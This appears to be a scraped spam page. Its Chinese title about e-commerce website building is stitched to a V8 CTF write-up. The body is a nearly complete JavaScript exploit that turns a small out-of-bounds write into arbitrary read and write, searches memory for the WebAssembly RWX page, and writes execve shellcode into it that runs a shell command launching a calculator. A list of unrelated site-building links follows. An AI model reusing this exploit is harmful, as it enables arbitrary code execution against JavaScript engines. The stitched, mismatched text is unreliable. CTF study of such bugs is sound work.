当前位置: 首页 > news >正文

电子商务网站建设信息企业网站的功能可分为前台和后台两个部分

电子商务网站建设信息,企业网站的功能可分为前台和后台两个部分,在谷歌上做网站广告要多少钱,网站检测中心做的第一道存在指针压缩机制的V8题#xff0c;通过小越界写修改length构造大越界读写#xff0c;然后利用arraybuffer的backing store构造任意地址写#xff0c;利用wasm rwx段地址的特点以及堆空间的分布#xff0c;搜索到rwx段的具体地址#xff0c;然后利用任意地址写将…做的第一道存在指针压缩机制的V8题通过小越界写修改length构造大越界读写然后利用arraybuffer的backing store构造任意地址写利用wasm rwx段地址的特点以及堆空间的分布搜索到rwx段的具体地址然后利用任意地址写将shellcode写到rwx段上去即可。 var buf new ArrayBuffer(0x8); var dv new DataView(buf); var buf new ArrayBuffer(16); var float64 new Float64Array(buf); var bigUint64 new BigUint64Array(buf); // function f2i(f) {float64[0] f;return bigUint64[0]; } // function i2f(i) {bigUint64[0] i;return float64[0]; } function p64(val) {dv.setUint32(0,val 0xFFFFFFFF,true);dv.setUint32(0x4,val 32,true);var float_val dv.getFloat64(0,true);return float_val; } function p64(low4,high4) {dv.setUint32(0,low4,true);dv.setUint32(0x4,high4,true);var float_val dv.getFloat64(0,true);return float_val; } function u64(val){dv.setFloat64(0,val,true);return dv.getBigInt64(0,true) } function u64_l(val) {dv.setFloat64(0,val,true);return dv.getUint32(0,true); }function u64_h(val) {dv.setFloat64(0,val,true);return dv.getUint32(0x4,true); } function hex(i) {return i.toString(16).padStart(16, 0); } var float_array[]; float_array[0]1.1; float_array.push(1.1,2.2,3.3,4.4,5.5,6.6); var victimnew Array(1.1,2.2); var ar_bfnew ArrayBuffer(0x100); var float_mapu64_l(float_array[17]); console.log([*] float_map is 0xhex(float_map)); var elementsu64_l(float_array[18]); float_array[18]p64(elements,0x10000000);const wasmCode new Uint8Array([0x00,0x61,0x73,0x6D,0x01,0x00,0x00,0x00,0x01,0x85,0x80,0x80,0x80,0x00,0x01,0x60,0x00,0x01,0x7F,0x03,0x82,0x80,0x80,0x80,0x00,0x01,0x00,0x04,0x84,0x80,0x80,0x80,0x00,0x01,0x70,0x00,0x00,0x05,0x83,0x80,0x80,0x80,0x00,0x01,0x00,0x01,0x06,0x81,0x80,0x80,0x80,0x00,0x00,0x07,0x91,0x80,0x80,0x80,0x00,0x02,0x06,0x6D,0x65,0x6D,0x6F,0x72,0x79,0x02,0x00,0x04,0x6D,0x61,0x69,0x6E,0x00,0x00,0x0A,0x8A,0x80,0x80,0x80,0x00,0x01,0x84,0x80,0x80,0x80,0x00,0x00,0x41,0x2A,0x0B]); const shellcode new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);var wasmModule new WebAssembly.Module(wasmCode); var wasmInstance new WebAssembly.Instance(wasmModule); var func wasmInstance.exports.main;var rwx_addr; var rwx_addr_l; var rwx_addr_h; for(let i0x100;i1;i--) { rwx_addrf2i(victim[0x31400i]);if(rwx_addr%0x1000n0nrwx_addr!0nrwx_addr%0x100000000n!0n)break; } console.log([*]rwx_addr is 0xhex(rwx_addr)); rwx_addr_lrwx_addr%0x100000000n; rwx_addr_hrwx_addr32n;victim[4]p64(0,Number(rwx_addr_l)); victim[5]p64(Number(rwx_addr_h),0); victim[6]p64(0,2); var adv new DataView(ar_bf); for (var i0;ishellcode.length;i) {adv.setUint8(i,shellcode[i], true); } //%SystemBreak(); func();
http://www.dnsts.com.cn/news/233200.html

相关文章:

  • 七初SEO网站建设软文编辑
  • 企业网站收费网络营销的推广方式有哪些
  • 网站建设类的论文题目凡科做的网站
  • 一个网站的建设流程图网络服务提供者不得向未成年提供诱导其沉迷的服务
  • 网站建设先进上海网站建设哪家好
  • 怎样做一个简单的网站首页移动互联网开发的学习心得
  • 个人网站做导购要什么经营许可网站优化的方式有哪些
  • copyright技术支持 东莞网站建设介绍网页设计
  • 扬中网站建设开发北京交易中心网站
  • 湖南省建筑设计院集团有限公司seo网络优化公司排名
  • 余姚网站建设网上卖东西怎么卖
  • 安监网站如何做紧急预案备案佛山企业网站自助建站
  • 对网站建设 意见和建议深圳企业网站设
  • 济南企业网站推广方法网站后台上传文字图片
  • ui在线设计网站武夷山网站推广服务
  • 制作网站的详细步骤视觉灵动 wordpress
  • 做网站为什么用php广告设计制作教程
  • 成都旅游网站建设规划方案qq网页版登录官网登录网站
  • 你做的网站可视区域多少网站后台无法上传照片
  • 网站平台建设专家意见hao123网站模板
  • 在大学做网站wamp个人网站开发来源
  • 涿州网站建设公司wordpress显示文章标题
  • 网站的内链优化怎样做推广渠道的优缺点
  • 石家庄手机网站建设公司wordpress 评论 验证码
  • 江苏省网站备案注销wordpress守望
  • 湖北专业网站建设维修电话招聘网站做销售
  • ajs17网站建设网站建设的作用是什么
  • 上海网站开发开发好的公司电话移动商城官网 积分兑换
  • 利用店铺网站做灰色优化中国十大广告公司
  • 网站开发的五个阶段移动应用开发网站